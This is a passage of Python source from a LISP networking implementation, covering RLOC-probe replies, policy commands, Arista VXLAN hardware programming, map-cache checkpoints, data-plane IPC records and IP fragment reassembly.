    # Build IPC message and send to the lisp-etr process.
    #
    ipc = "rtr%{}%{}".format(rtr_str, updown)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
    return
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
    mrloc):
    rloc = rloc_entry.rloc
    nonce = map_reply.nonce
    hop_count = map_reply.hop_count
    probe = bold("RLOC-probe reply", False)
    rloc_str = rloc.print_address_no_iid()
    source_str = source.print_address_no_iid()
    probe_list = lisp_rloc_probe_list
    json_telemetry = rloc_entry.json.json_string if rloc_entry.json else None
    ts = lisp_get_timestamp()

    #
    # For a reply to a multicast RLOC-probe, keep per-member state in
    # the mrloc's multicast_rloc_probe_list, keyed by unicast address.
    #
    if (mrloc != None):
        mrloc_str = mrloc.rloc.print_address_no_iid()
        if (rloc_str not in mrloc.multicast_rloc_probe_list):
            mc_rloc = lisp_rloc()
            mc_rloc = copy.deepcopy(mrloc)
            mc_rloc.rloc.copy_address(rloc)
            mc_rloc.multicast_rloc_probe_list = {}
            mrloc.multicast_rloc_probe_list[rloc_str] = mc_rloc

        mc_rloc = mrloc.multicast_rloc_probe_list[rloc_str]
        mc_rloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
        mc_rloc.last_rloc_probe = mrloc.last_rloc_probe
        r, eid, group = lisp_rloc_probe_list[mrloc_str][0]
        mc_rloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_telemetry)
        mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_telemetry)
        return

    #
    # Find the RLOC in the probe list. Try the RLOC address, then
    # RLOC:port, then the reply's source address (the RLOC may be behind
    # a NAT, in which case probes were sent to a translated address).
    #
    addr_str = rloc_str
    if (addr_str not in probe_list):
        addr_str += ":" + str(port)
        if (addr_str not in probe_list):
            addr_str = source_str
            if (addr_str not in probe_list):
                addr_str += ":" + str(port)
                lprint("    Received unsolicited {} from {}/{}, port {}".\
                    format(probe, red(rloc_str, False), red(source_str,
                    False), port))
                return

    #
    # Update probe state for every (EID, group) that uses this RLOC.
    #
    for rloc, eid, group in lisp_rloc_probe_list[addr_str]:
        if (lisp_i_am_rtr):
            if (rloc.translated_port != 0 and
                rloc.translated_port != port): continue

        rloc.process_rloc_probe_reply(ts, nonce, eid, group, hop_count,
            ttl, json_telemetry)

    return
def lisp_db_list_length():
    count = 0
    for db in lisp_db_list:
        count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
        count += len(db.eid.iid_list)

    return(count)
def lisp_is_myeid(eid):
    for db in lisp_db_list:
        if (eid.is_more_specific(db.eid)): return(True)

    return(False)
def lisp_format_macs(sa, da):
    sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
    da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
    return("{} -> {}".format(sa, da))
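
# Usage sketch (hypothetical values): both arguments are 12-hex-digit MAC
# strings, rendered in dash-separated groups of four:
#
#   lisp_format_macs("0050b6123456", "0050b6654321")
#   # returns "0050-b612-3456 -> 0050-b665-4321"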
def lisp_get_echo_nonce(rloc, rloc_str):
    if (lisp_nonce_echoing == False): return(None)

    if (rloc): rloc_str = rloc.print_address_no_iid()
    echo_nonce = None
    if (rloc_str in lisp_nonce_echo_list):
        echo_nonce = lisp_nonce_echo_list[rloc_str]

    return(echo_nonce)
def lisp_decode_dist_name(packet):
    count = 0
    dist_name = b""

    while (packet[0:1] != b"\x00"):
        if (count == 255): return([None, None])
        dist_name += packet[0:1]
        packet = packet[1::]
        count += 1

    packet = packet[1::]
    return(packet, dist_name.decode())
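
# Usage sketch (hypothetical buffer): a distinguished-name is a
# NUL-terminated byte string at the front of the packet; the remainder is
# returned for further parsing:
#
#   rest, name = lisp_decode_dist_name(b"xtr-site-a\x00\x01\x02")
#   # name == "xtr-site-a", rest == b"\x01\x02"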
def lisp_write_flow_log(flow_log):
    f = open("./logs/lisp-flow.log", "a")

    count = 0
    for flow in flow_log:
        packet = flow[3]
        flow_str = packet.print_flow(flow[0], flow[1], flow[2])
        f.write(flow_str)
        count += 1

    f.close()
    del(flow_log)

    count = bold(str(count), False)
    lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
    return
def lisp_policy_command(kv_pair):
    p = lisp_policy("")
    set_iid = None

    #
    # One match clause per entry in the parallel keyword arrays.
    #
    match_set = []
    for i in range(len(kv_pair["datetime-range"])):
        match_set.append(lisp_policy_match())

    for kw in list(kv_pair.keys()):
        value = kv_pair[kw]

        #
        # Match parameters: one array slot per match clause. An empty
        # string means the parameter is unset for that clause.
        #
        if (kw == "instance-id"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                m = match_set[i]
                if (m.source_eid == None):
                    m.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                if (m.dest_eid == None):
                    m.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.source_eid.instance_id = int(v)
                m.dest_eid.instance_id = int(v)

        if (kw == "source-eid"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                m = match_set[i]
                if (m.source_eid == None):
                    m.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = m.source_eid.instance_id
                m.source_eid.store_prefix(v)
                m.source_eid.instance_id = iid

        if (kw == "destination-eid"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                m = match_set[i]
                if (m.dest_eid == None):
                    m.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
                iid = m.dest_eid.instance_id
                m.dest_eid.store_prefix(v)
                m.dest_eid.instance_id = iid

        if (kw == "source-rloc"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                m = match_set[i]
                m.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.source_rloc.store_prefix(v)

        if (kw == "destination-rloc"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                m = match_set[i]
                m.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
                m.dest_rloc.store_prefix(v)

        if (kw == "rloc-record-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match_set[i].rloc_record_name = v

        if (kw == "geo-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match_set[i].geo_name = v

        if (kw == "elp-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match_set[i].elp_name = v

        if (kw == "rle-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match_set[i].rle_name = v

        if (kw == "json-name"):
            for i in range(len(match_set)):
                v = value[i]
                if (v == ""): continue
                match_set[i].json_name = v

        if (kw == "datetime-range"):
            for i in range(len(match_set)):
                v = value[i]
                m = match_set[i]
                if (v == ""): continue
                lower = lisp_datetime(v[0:19])
                upper = lisp_datetime(v[19::])
                if (lower.valid_datetime() and upper.valid_datetime()):
                    m.datetime_lower = lower
                    m.datetime_upper = upper

        #
        # Set parameters: one per policy.
        #
        if (kw == "set-action"):
            p.set_action = value

        if (kw == "set-record-ttl"):
            p.set_record_ttl = int(value)

        if (kw == "set-instance-id"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            set_iid = int(value)
            p.set_source_eid.instance_id = set_iid
            p.set_dest_eid.instance_id = set_iid

        if (kw == "set-source-eid"):
            if (p.set_source_eid == None):
                p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_source_eid.store_prefix(value)
            if (set_iid != None): p.set_source_eid.instance_id = set_iid

        if (kw == "set-destination-eid"):
            if (p.set_dest_eid == None):
                p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_dest_eid.store_prefix(value)
            if (set_iid != None): p.set_dest_eid.instance_id = set_iid

        if (kw == "set-rloc-address"):
            p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
            p.set_rloc_address.store_address(value)

        if (kw == "set-rloc-record-name"):
            p.set_rloc_record_name = value

        if (kw == "set-elp-name"):
            p.set_elp_name = value

        if (kw == "set-geo-name"):
            p.set_geo_name = value

        if (kw == "set-rle-name"):
            p.set_rle_name = value

        if (kw == "set-json-name"):
            p.set_json_name = value

        if (kw == "policy-name"):
            p.policy_name = value

    #
    # Store match clauses and save the policy.
    #
    p.match_clauses = match_set
    p.save_policy()
    return
lisp_policy_commands = {
    "lisp policy" : [lisp_policy_command, {
        "policy-name" : [True],
        "match" : [],
        "instance-id" : [True, 0, 0xffffffff],
        "source-eid" : [True],
        "destination-eid" : [True],
        "source-rloc" : [True],
        "destination-rloc" : [True],
        "rloc-record-name" : [True],
        "elp-name" : [True],
        "geo-name" : [True],
        "rle-name" : [True],
        "json-name" : [True],
        "datetime-range" : [True],
        "set-action" : [False, "process", "drop"],
        "set-record-ttl" : [True, 0, 0x7fffffff],
        "set-instance-id" : [True, 0, 0xffffffff],
        "set-source-eid" : [True],
        "set-destination-eid" : [True],
        "set-rloc-address" : [True],
        "set-rloc-record-name" : [True],
        "set-elp-name" : [True],
        "set-geo-name" : [True],
        "set-rle-name" : [True],
        "set-json-name" : [True]}]
}
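
# Sketch of the expected input (hypothetical values): the command parser
# delivers one kv_pair dict per "lisp policy" clause, with parallel arrays
# for the match keywords (one slot per match clause, "" meaning unset):
#
#   kv_pair = {"policy-name": "drop-tenant-b",
#              "datetime-range": [""],
#              "instance-id": ["2000"],
#              "set-action": "drop"}
#   lisp_policy_command(kv_pair)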
def lisp_send_to_arista(command, interface):
    interface = "" if (interface == None) else "interface " + interface

    display = command
    if (interface != ""): display = interface + ": " + display
    lprint("Send CLI command '{}' to hardware".format(display))

    commands = '''
enable
configure
{}
{}
'''.format(interface, command)

    os.system("FastCli -c '{}'".format(commands))
    return
def lisp_arista_is_alive(prefix):
    cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
    output = getoutput("FastCli -c '{}'".format(cmd))

    #
    # Skip the header line and take the last column of the route line.
    #
    output = output.split("\n")[1]
    flag = output.split(" ")
    flag = flag[-1].replace("\r", "")

    #
    # "Y" in the last column means the hardware considers the route alive.
    #
    return(flag == "Y")
def lisp_program_vxlan_hardware(mc):

    #
    # Only program hardware on a system with lispers.net installed in
    # /persist/local/lispers.net.
    #
    if (os.path.exists("/persist/local/lispers.net") == False): return

    #
    # Need at least one RLOC to program.
    #
    if (len(mc.best_rloc_set) == 0): return

    eid_prefix = mc.eid.print_prefix_no_iid()
    rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()

    #
    # Check if the route is already programmed.
    #
    route = getoutput("ip route get {} | egrep vlan4094".format(eid_prefix))
    if (route != ""):
        lprint("Route {} already in hardware: '{}'".format(
            green(eid_prefix, False), route))
        return

    #
    # A vxlan interface and a vlan4094 interface with an IP address are
    # required for this to work.
    #
    ifconfig = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
    if (ifconfig.find("vxlan") == -1):
        lprint("No VXLAN interface found, cannot program hardware")
        return

    if (ifconfig.find("vlan4094") == -1):
        lprint("No vlan4094 interface found, cannot program hardware")
        return

    ipaddr = getoutput("ip addr | egrep vlan4094 | egrep inet")
    if (ipaddr == ""):
        lprint("No IP address found on vlan4094, cannot program hardware")
        return

    ipaddr = ipaddr.split("inet ")[1]
    ipaddr = ipaddr.split("/")[0]

    #
    # Collect ARP entries on vlan4094; they are excluded when picking a
    # next-hop address below.
    #
    arp_entries = []
    arp_lines = getoutput("arp -i vlan4094").split("\n")
    for line in arp_lines:
        if (line.find("vlan4094") == -1): continue
        if (line.find("(incomplete)") == -1): continue
        entry = line.split(" ")[0]
        arp_entries.append(entry)

    #
    # Allocate an unused address on the vlan4094 subnet to act as the
    # next-hop for the EID-prefix route.
    #
    nh = None
    my_addr = ipaddr
    ipaddr = ipaddr.split(".")
    for i in range(1, 255):
        ipaddr[3] = str(i)
        addr = ".".join(ipaddr)
        if (addr in arp_entries): continue
        if (addr == my_addr): continue
        nh = addr
        break

    if (nh == None):
        lprint("Address allocation failed for vlan4094, cannot program " +
            "hardware")
        return

    #
    # Derive a MAC address from the RLOC and install it as a static ARP
    # entry for the allocated next-hop.
    #
    octets = rloc.split(".")
    byte1 = lisp_hex_string(octets[1]).zfill(2)
    byte2 = lisp_hex_string(octets[2]).zfill(2)
    byte3 = lisp_hex_string(octets[3]).zfill(2)
    mac = "00:00:00:{}:{}:{}".format(byte1, byte2, byte3)
    mac_str = "0000.00{}.{}{}".format(byte1, byte2, byte3)
    arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
    os.system(arp_command)

    #
    # Point the static MAC entry at the VXLAN tunnel endpoint (the RLOC).
    #
    mac_command = ("mac address-table static {} vlan 4094 " +
        "interface vxlan 1 vtep {}").format(mac_str, rloc)
    lisp_send_to_arista(mac_command, None)

    #
    # Install the EID-prefix route via the allocated next-hop.
    #
    route_command = "ip route add {} via {}".format(eid_prefix, nh)
    os.system(route_command)

    lprint("Hardware programmed with commands:")
    route_command = route_command.replace(eid_prefix, green(eid_prefix,
        False))
    lprint("  " + route_command)
    lprint("  " + arp_command)
    mac_command = mac_command.replace(rloc, red(rloc, False))
    lprint("  " + mac_command)
    return
def lisp_clear_hardware_walk(mc, parms):
    prefix = mc.eid.print_prefix_no_iid()
    os.system("ip route delete {}".format(prefix))
    return([True, None])
def lisp_clear_map_cache():
    global lisp_map_cache, lisp_rloc_probe_list
    global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
    global lisp_rtr_list, lisp_gleaned_groups
    global lisp_no_map_request_rate_limit

    cleared = bold("User cleared", False)
    count = lisp_map_cache.cache_count
    lprint("{} map-cache with {} entries".format(cleared, count))

    if (lisp_program_hardware):
        lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)

    lisp_map_cache = lisp_cache()

    #
    # Restart Map-Request rate-limiting.
    #
    lisp_no_map_request_rate_limit = lisp_get_timestamp()

    #
    # Clear the RLOC-probe list.
    #
    lisp_rloc_probe_list = {}

    #
    # Clear crypto-keys in both directions.
    #
    lisp_crypto_keys_by_rloc_encap = {}
    lisp_crypto_keys_by_rloc_decap = {}

    #
    # Clear the RTR-list.
    #
    lisp_rtr_list = {}

    #
    # Clear gleaned groups.
    #
    lisp_gleaned_groups = {}

    #
    # Tell the external data-plane, if one is running.
    #
    lisp_process_data_plane_restart(True)
    return
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
    if (len(lisp_sockets) != 4): return

    local_addr = lisp_myrlocs[0]

    #
    # Build IP and UDP headers for the inner RLOC-probe control message;
    # total length adds 20 bytes of IP header and 8 bytes of UDP header.
    #
    length = len(packet) + 28
    ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
        17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
    ip = lisp_ip_checksum(ip)

    udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
        socket.htons(length - 20), 0)

    #
    # Build packet payload and set addresses for data encapsulation.
    #
    packet = lisp_packet(ip + udp + packet)

    packet.inner_dest.copy_address(rloc)
    packet.inner_dest.instance_id = 0xffffff
    packet.inner_source.copy_address(local_addr)
    packet.inner_ttl = 64
    packet.outer_dest.copy_address(rloc)
    packet.outer_source.copy_address(local_addr)
    packet.outer_version = packet.outer_dest.afi_to_version()
    packet.outer_ttl = 64
    packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT

    rloc_str = red(rloc.print_address_no_iid(), False)
    if (nat_info):
        hostname = " {}".format(blue(nat_info.hostname, False))
        probe = bold("RLOC-probe request", False)
    else:
        hostname = ""
        probe = bold("RLOC-probe reply", False)

    lprint(("Data encapsulate {} to {}{} port {} for " +
        "NAT-traversal").format(probe, rloc_str, hostname,
        packet.encap_port))

    #
    # Encode and send the data encapsulated RLOC-probe.
    #
    if (packet.encode(None) == None): return
    packet.print_packet("Send", True)

    raw_socket = lisp_sockets[3]
    packet.send_packet(raw_socket, packet.outer_dest)
    del(packet)
    return
def lisp_get_default_route_next_hops():

    #
    # Handle macOS differently from Linux.
    #
    if (lisp_is_macos()):
        cmd = "route -n get default"
        lines = getoutput(cmd).split("\n")
        gw = interface = None
        for line in lines:
            if (line.find("gateway: ") != -1): gw = line.split(": ")[1]
            if (line.find("interface: ") != -1):
                interface = line.split(": ")[1]

        return([[interface, gw]])

    #
    # Linux: parse "ip route" default entries, ignoring metric routes.
    #
    cmd = "ip route | egrep 'default via'"
    routes = getoutput(cmd).split("\n")

    next_hops = []
    for route in routes:
        if (route.find(" metric ") != -1): continue
        r = route.split(" ")
        try:
            via_index = r.index("via") + 1
            if (via_index >= len(r)): continue
            dev_index = r.index("dev") + 1
            if (dev_index >= len(r)): continue
        except:
            continue

        next_hops.append([r[dev_index], r[via_index]])

    return(next_hops)
def lisp_get_host_route_next_hop(rloc):
    cmd = "ip route | egrep '{} via'".format(rloc)
    route = getoutput(cmd).split(" ")

    try: via_index = route.index("via") + 1
    except: return(None)

    if (via_index >= len(route)): return(None)
    return(route[via_index])
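
# Example (hypothetical routing table): with "10.1.1.1 via 192.168.1.254
# dev eth0" installed, lisp_get_host_route_next_hop("10.1.1.1") returns
# "192.168.1.254"; it returns None when no host route exists.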
def lisp_install_host_route(dest, nh, install):
    install = "add" if install else "delete"
    nh_str = "none" if nh == None else nh

    lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))

    if (nh == None):
        cmd = "ip route {} {}/32".format(install, dest)
    else:
        cmd = "ip route {} {}/32 via {}".format(install, dest, nh)

    os.system(cmd)
    return
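
# Usage sketch (hypothetical addresses): steer traffic for an RLOC through
# a specific next-hop, then remove the route again:
#
#   lisp_install_host_route("10.1.1.1", "192.168.1.254", True)
#   # runs: ip route add 10.1.1.1/32 via 192.168.1.254
#   lisp_install_host_route("10.1.1.1", "192.168.1.254", False)
#   # runs: ip route delete 10.1.1.1/32 via 192.168.1.254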
def lisp_checkpoint(checkpoint_list):
    if (lisp_checkpoint_map_cache == False): return

    f = open(lisp_checkpoint_filename, "w")
    for entry in checkpoint_list:
        f.write(entry + "\n")

    f.close()
    lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
        len(checkpoint_list), lisp_checkpoint_filename))
    return
def lisp_load_checkpoint():
    if (lisp_checkpoint_map_cache == False): return
    if (os.path.exists(lisp_checkpoint_filename) == False): return

    f = open(lisp_checkpoint_filename, "r")

    count = 0
    for entry in f:
        count += 1
        e = entry.split(" rloc ")
        rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
            e[1].split(", ")

        rloc_set = []
        for rloc in rlocs:
            rloc_entry = lisp_rloc(False)
            r = rloc.split(" ")
            rloc_entry.rloc.store_address(r[0])
            rloc_entry.priority = int(r[1])
            rloc_entry.weight = int(r[2])
            rloc_set.append(rloc_entry)

        mc = lisp_mapping("", "", rloc_set)
        if (mc != None):
            mc.eid.store_prefix(e[0])
            mc.checkpoint_entry = True
            mc.map_cache_ttl = LISP_NMR_TTL * 60
            if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
            mc.add_cache()
            continue

        count -= 1

    f.close()
    lprint("{} {} map-cache entries from file '{}'".format(
        bold("Loaded", False), count, lisp_checkpoint_filename))
    return

def lisp_write_checkpoint_entry(checkpoint_list, mc):
    if (lisp_checkpoint_map_cache == False): return

    entry = "{} rloc ".format(mc.eid.print_prefix())

    for rloc in mc.rloc_set:
        if (rloc.rloc.is_null()): continue
        entry += "{} {} {}, ".format(rloc.rloc.print_address_no_iid(),
            rloc.priority, rloc.weight)

    if (mc.rloc_set != []):
        entry = entry[0:-2]
    elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
        entry += "native-forward"

    checkpoint_list.append(entry)
    return
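
# Sketch of the checkpoint line format produced above (addresses and
# instance-IDs hypothetical). An entry with two RLOCs:
#
#   [0]10.0.0.0/8 rloc 1.1.1.1 1 100, 2.2.2.2 2 50
#
# and a native-forward entry with no RLOCs:
#
#   [0]10.0.0.0/8 rloc native-forward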

def lisp_check_dp_socket():
    socket_name = lisp_ipc_dp_socket_name
    if (os.path.exists(socket_name) == False):
        dne = bold("does not exist", False)
        lprint("Socket '{}' {}".format(socket_name, dne))
        return(False)
    return(True)

def lisp_write_to_dp_socket(entry):
    try:
        rec = json.dumps(entry)
        write = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(write, rec))
        lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
    except:
        # Print the original entry; 'rec' is unbound if json.dumps() failed.
        lprint("Failed to write IPC record to named socket: '{}'".format(
            entry))
    return

def lisp_write_ipc_keys(rloc):
    addr_str = rloc.rloc.print_address_no_iid()
    port = rloc.translated_port
    if (port != 0): addr_str += ":" + str(port)
    if (addr_str not in lisp_rloc_probe_list): return

    for r, eid, group in lisp_rloc_probe_list[addr_str]:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc == None): continue
        lisp_write_ipc_map_cache(True, mc)
    return

def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Write record in JSON format. Multicast entries carry an "rles"
    # array, unicast entries an "rlocs" array.
    #
    opcode = "add" if add_or_delete else "delete"
    entry = { "type" : "map-cache", "opcode" : opcode }

    multicast = (mc.group.is_null() == False)
    if (multicast):
        entry["eid-prefix"] = mc.group.print_prefix_no_iid()
        entry["rles"] = []
    else:
        entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
        entry["rlocs"] = []

    entry["instance-id"] = str(mc.eid.instance_id)

    if (multicast):
        if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
            for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
                addr = rle_node.address.print_address_no_iid()
                port = str(4341) if rle_node.translated_port == 0 else \
                    str(rle_node.translated_port)
                r = { "rle" : addr, "port" : port }
                ekey, ikey = rle_node.get_encap_keys()
                r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
                entry["rles"].append(r)
    else:
        for rloc in mc.rloc_set:
            if (rloc.rloc.is_ipv4() == False and
                rloc.rloc.is_ipv6() == False): continue
            if (rloc.up_state() == False): continue

            port = str(4341) if rloc.translated_port == 0 else \
                str(rloc.translated_port)
            r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
                str(rloc.priority), "weight" : str(rloc.weight), "port" :
                port }
            ekey, ikey = rloc.get_encap_keys()
            r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
            entry["rlocs"].append(r)

    if (dont_send == False): lisp_write_to_dp_socket(entry)
    return(entry)
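
# Hedged example of a unicast JSON record written to the data-plane
# socket (field values hypothetical):
#
#   { "type" : "map-cache", "opcode" : "add",
#     "eid-prefix" : "10.0.0.0/8", "instance-id" : "0",
#     "rlocs" : [ { "rloc" : "1.1.1.1", "priority" : "1",
#                   "weight" : "100", "port" : "4341" } ] }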

def lisp_write_ipc_decap_key(rloc_addr, keys):
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    if (keys == None or len(keys) == 0 or keys[1] == None): return

    ekey = keys[1].encrypt_key
    ikey = keys[1].icv_key

    #
    # The rloc_addr string may carry a port ("<addr>:<port>").
    #
    rp = rloc_addr.split(":")
    if (len(rp) == 1):
        entry = { "type" : "decap-keys", "rloc" : rp[0] }
    else:
        entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }

    entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")

    lisp_write_to_dp_socket(entry)
    return

def lisp_build_json_keys(entry, ekey, ikey, key_type):
    if (ekey == None): return(entry)

    entry["keys"] = []
    key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
    entry["keys"].append(key)
    return(entry)
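
# Example of the sub-object this helper adds, assuming ekey/ikey are
# hex key strings (values hypothetical):
#
#   { ..., "keys" : [ { "key-id" : "1", "encrypt-key" : "a1b2...",
#                       "icv-key" : "c3d4..." } ] }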

def lisp_write_ipc_database_mappings(ephem_port):
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = { "type" : "database-mappings", "database-mappings" : [] }

    for db in lisp_db_list:
        if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
        record = { "instance-id" : str(db.eid.instance_id),
            "eid-prefix" : db.eid.print_prefix_no_iid() }
        entry["database-mappings"].append(record)

    lisp_write_to_dp_socket(entry)

    #
    # Also tell the data-plane the ephemeral NAT port the ETR listens on.
    #
    entry = { "type" : "etr-nat-port", "port" : ephem_port }
    lisp_write_to_dp_socket(entry)
    return

def lisp_write_ipc_interfaces():
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    entry = { "type" : "interfaces", "interfaces" : [] }

    for interface in list(lisp_myinterfaces.values()):
        if (interface.instance_id == None): continue
        record = { "interface" : interface.device,
            "instance-id" : str(interface.instance_id) }
        entry["interfaces"].append(record)

    lisp_write_to_dp_socket(entry)
    return

def lisp_parse_auth_key(value):
    values = value.split("[")
    auth_key = {}
    if (len(values) == 1):
        auth_key[0] = value
        return(auth_key)

    for v in values:
        if (v == ""): continue
        index = v.find("]")
        key_id = v[0:index]
        try: key_id = int(key_id)
        except: return

        auth_key[key_id] = v[index + 1::]
    return(auth_key)
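
# Doctest-style sketch (key strings hypothetical). An unbracketed value
# gets key-id 0; bracketed values are indexed by their key-id:
#
#   >>> lisp_parse_auth_key("my-password")
#   {0: 'my-password'}
#   >>> lisp_parse_auth_key("[1]secret1[2]secret2")
#   {1: 'secret1', 2: 'secret2'}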

def lisp_reassemble(packet):
    frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    #
    # Not a fragment, return packet as is.
    #
    if (frag_field == 0 or frag_field == 0x4000): return(packet)

    #
    # Get IP identification and total-length fields.
    #
    ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    frag_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])

    last_frag = (frag_field & 0x2000 == 0 and (frag_field & 0x1fff) != 0)
    entry = [(frag_field & 0x1fff) * 8, frag_len - 20, packet, last_frag]

    #
    # For the first fragment, verify it is LISP encapsulated. If not,
    # remember the packet-ID so later fragments are dropped too.
    #
    if (frag_field == 0x2000):
        sport, dport = struct.unpack("HH", packet[20:24])
        sport = socket.ntohs(sport)
        dport = socket.ntohs(dport)
        if (dport not in [4341, 8472, 4789] and sport != 4341):
            lisp_reassembly_queue[ident] = []
            entry[2] = None

    #
    # Create reassembly queue for this packet-ID if needed.
    #
    if (ident not in lisp_reassembly_queue):
        lisp_reassembly_queue[ident] = []

    queue = lisp_reassembly_queue[ident]

    #
    # Drop fragments of packets known to be non-LISP encapsulated.
    #
    if (len(queue) == 1 and queue[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format(
            lisp_hex_string(ident).zfill(4)))
        return(None)

    queue.append(entry)
    queue = sorted(queue)

    #
    # Print source and destination RLOCs of the fragment.
    #
    addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = addr.print_address_no_iid()
    addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    dest = addr.print_address_no_iid()
    rlocs = red("{} -> {}".format(source, dest), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format(
        bold("Received", False), " non-LISP encapsulated" if \
        entry[2] == None else "", rlocs, lisp_hex_string(ident).zfill(4),
        lisp_hex_string(frag_field).zfill(4)))

    #
    # All fragments arrived? The first offset must be 0, the last
    # fragment must be queued, and offsets/lengths must be contiguous.
    #
    if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
    last_entry = queue[0]
    for frag in queue[1::]:
        offset = frag[0]
        prev_offset, prev_len = last_entry[0], last_entry[1]
        if (prev_offset + prev_len != offset): return(None)
        last_entry = frag

    lisp_reassembly_queue.pop(ident)

    #
    # Concatenate the IP payloads of all fragments.
    #
    packet = queue[0][2]
    for frag in queue[1::]: packet += frag[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format(
        bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))

    #
    # Rebuild the IP header: fix total-length, zero the fragment field
    # and checksum, then recompute the checksum.
    #
    length = socket.htons(len(packet))
    header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
        struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
        packet[12:20]

    header = lisp_ip_checksum(header)
    return(header + packet[20::])
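
# Contiguity sketch: queue entries are [offset, payload-length, packet,
# is-last-frag], sorted by offset. For three fragments with 1480-byte
# payloads (hypothetical sizes) the walk checks 0 + 1480 == 1480 and
# 1480 + 1480 == 2960; only then are the payloads past byte 20 of each
# fragment concatenated onto the first packet.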

def lisp_get_crypto_decap_lookup_key(addr, port):
    addr_str = addr.print_address_no_iid() + ":" + str(port)
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    addr_str = addr.print_address_no_iid()
    if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)

    #
    # Search for an entry stored with another port; an xTR behind a NAT
    # may have changed ports. Cache a match under the plain address.
    #
    for key in lisp_crypto_keys_by_rloc_decap:
        a = key.split(":")
        if (len(a) == 1): continue
        a = a[0] if len(a) == 2 else ":".join(a[0:-1])
        if (a == addr_str):
            keys = lisp_crypto_keys_by_rloc_decap[key]
            lisp_crypto_keys_by_rloc_decap[addr_str] = keys
            return(addr_str)

    return(None)
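
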